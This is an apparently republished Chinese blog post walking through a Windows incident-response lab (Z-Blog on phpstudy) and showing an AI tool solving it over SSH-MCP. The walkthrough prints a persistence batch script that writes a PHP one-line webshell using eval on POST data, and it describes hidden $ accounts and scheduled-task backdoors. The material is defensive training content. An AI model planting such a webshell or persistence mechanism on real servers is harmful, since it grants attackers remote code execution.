文章总结： 本文记录了利用Trae配合SSH-MCP自动化解决LingJingWindows应急响应靶机的实践。AI高效分析日志与配置，定位攻击者IP、隐藏账户及flag。特别是AI通过扫描数据库文件提取信息，展现了非预期解法且Token消耗低，验证了AI在安全运维中的高效率。 综合评分： 95 文章分类： 应急响应,AI安全,实战经验

使用AI 通关LingJing(灵境)「知攻善防」Windows 应急响应靶机

原创

414a

Sec铁匠铺

2026年1月6日 09:00 云南

👇  本文内容出自  👇

👆  这个公众号  👆

#

1.LingJing(灵境)介绍

LingJing 是一款专为复杂网络环境渗透测试量身打造的桌面级本地网络安全靶场平台。支持在线下载和免配置一键部署靶机环境，平台内置路由管理、监控打靶流量，快速启动靶机，满足从入门学习到红蓝队攻防实战的训练需求。后续版本将更新内置 Attacker 机器，进一步完善渗透测试打靶训练的完整流程，显著提升用户的训练体验和效率。本平台基于 Go+Fyne 构建图形界面，底层采用 QEMU 虚拟化技术，支持跨架构靶机启动。并且能在 Mac M 系列芯片设备上启动 AMD64 架构靶机，确保在不同硬件环境下无缝开展测试与训练。

👇   灵境桌面级靶场平台   👇

👆公众号👆

灵境访问地址

靶场项目访问地址https://github.com/414aaj/LingJing网盘下载地址夸克：https://pan.quark.cn/s/e6f3a48329fb百度：https://pan.baidu.com/s/14mjUdqHhoSEfVqe2h9VqoQ?pwd=cz94

2.靶机介绍

知攻善防实验室-Windows-Web-3

题目描述：

情景模拟：深夜省护值守的”第六感”事件

时间：2024年3月12日 凌晨2:17

地点：某省电子政务外网监控大厅

人物：值班安全员414a、应急响应负责人3had0w

【监控告警】

凌晨2点17分，省护监控大屏突然跳出一条异常告警：政务门户网站服务器（IP:192.168.242.x）出现高频POST请求。值班员414a揉了揉发酸的眼睛，盯着屏幕上一连串指向 cmd.php 的请求日志，心跳突然加速。

“这流量模式……不对劲。”414a喃喃自语，手指悬在紧急断网按钮上方颤抖了三秒，然后猛地按了下去。

【甲方质询】

“为什么要停设备？”电话那头，甲方负责人的声音带着被吵醒的怒意。

414a咽了口唾沫，声音发虚却坚定：”我第六感告诉我，这机器可能被黑了。刚才日志里出现大量 cmd.php 的POST请求，像是WebShell在接收指令。”

“第六感？”对方冷笑，”你最好真的能找出证据，否则……”

【应急响应启动】

早上7点，应急响应负责人3had0w带着团队赶到现场。414a已经按照预案将靶机隔离，并准备好了分析环境。

“说说你的发现。”3had0w一边启动VMware Workstation，一边问道。

“服务器是Windows Server 2022，跑着phpstudy搭建的Z-Blog博客系统。我暂停服务前抓了几个关键日志。”414a递上移动硬盘，”账户密码是 administrator/2025@LingJing ，已经在靶机里。”

【线索追踪】

第一步：日志溯源攻击IP

3had0w登录系统，直奔 D盘 。用Sublime Text打开后，搜索 .php 关键词，屏幕上瞬间被密密麻麻的日志填满。

“看这两个IP，”3had0w指着屏幕，”192.168.75.129和192.168.75.130，在凌晨1:30-2:15间持续对 cmd.php 发送POST请求，而且返回体都是200。这就是攻击源！”

414a赶紧记下： 攻击者IP1: 192.168.75.129 ， 攻击者IP2: 192.168.75.130 。

第二步：排查隐藏账户

“攻击者肯定不会只用WebShell，”3had0w打开”计算机管理”→”本地用户和组”，在用户列表里果然发现一个带$符号的异常账户—— xxxxxxxxx 。

“典型的隐藏用户，”3had0w解释，”Windows下以$结尾的用户名不会出现在 net user 命令结果里，但通过注册表或管理工具能看到。”他顺便检查了注册表 SAM\Domains\Account\Users\Names ，确认了该用户的SID。

414a补充： 隐藏用户名称: xxxxxxxxx 。

第三步：深挖权限维持

切换到 xxxxxxxxx 用户目录下，团队在 C盘路径下 发现了一个 system.bat 脚本。打开一看，内容触目惊心：

batch

@echo off

echo flag{xxxxxxxx}

echo ^<?php eval($_POST['pass']);?^> > D盘

“这就是第三个flag，”3had0w皱眉，”还在写一句话木马维持权限。”

第四步：任务计划里的秘密

3had0w打开”任务计划程序”，发现两个由 xxxxxxxxx 创建的任务。在任务描述的备注栏里，赫然写着： flag{zgsfsys@sec} 。

“两个任务都指向那个 system.bat ，”414a分析，”攻击者做了双重保险，确保重启后木马还能运行。”

第五步：网站后台的陷阱

“还差最后一个flag，”3had0w盯着题目要求，”题目说考点不在IP和用户，那应该在Web应用层。”

他启动phpstudy，访问`站点，发现是Z-Blog系统。尝试登录后台失败，3had0w灵机一动：”这是我们自己服务器，直接重置密码！”

下载Z-Blog官方密码重置工具 nologin.php 放到网站根目录，访问后顺利进入后台。在用户管理界面，一个名为 hack 的用户资料里藏着最后的线索：

flag{xxxxxxxx}

【复盘总结】

下午3点，3had0w向甲方提交报告：

事件结论：服务器遭WebShell入侵，攻击者通过Z-Blog漏洞上传 cmd.php 获取初始权限，创建隐藏用户 xxxxxxxxx 进行权限维持，并植入计划任务确保后门持久化。三个flag分别为权限维持标记、任务计划标记和后台留痕标记。

甲方负责人沉默片刻，对414a说：”……第六感有时候比规则更重要。”

414a长舒一口气，瘫在椅子上。监控大屏上，服务器已重装上线，日志干干净净。但这次”第六感”事件，成了他职业生涯中最难忘的一课。

通关条件验证：

1. ✅ 攻击者2个IP
2. ✅ 隐藏用户
3. ✅ 三个flag

3.开始AI分析

👇SSH-MCP相关介绍和安装方法👇

AI+安全 | 解锁 AI 远程应急响应新时代—Trae+SSH-MCP 自动应急排查远程服务器

👆

创建ssh连接

将题目描述和通关要求告知AI

可以看到AI迅速列出了todo list，并开始使用ssh-mcp的工具执行命令分析环境

在这一步的思考中，AI意识到了phpstudy可能是突破口，开始尝试分析相关Apache的日志

可以看到攻击者IP AI已经差不多分析出来了。

前两个flag也很快找到了。

然后最后一个flag，可以看到AI直接使用 PowerShell 对 MySQL 数据目录进行递归扫描，直接在 .MYD 数据文件中做字符串匹配，成功从表的物理数据中提取出明文 flag，这我倒是真没想到

AI给出了总结

最后下载靶机桌面的题解.exe来测试结果

交互验证，全部正确

token使用上，本次共使用了三次快速请求，创建ssh、分析题目、下载题解.exe，没有使用solo模式

4.总结

本次测试效果挺出乎意料，我原以为消耗的token会比较多，结果还挺少的，应该算是找到了一些非预期解，后续LingJing桌面级网络安全靶场平台上线的应急靶机也会持续测试。

如果觉得本文对你有帮助，欢迎关注、点赞、收藏，一键三连~

本文内容出自藏剑安全，可关注阅读更多文章噢

好文分享收藏赞一下最美点在看哦

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Sec铁匠铺 414a《使用AI 通关LingJing(灵境)「知攻善防」Windows 应急响应靶机》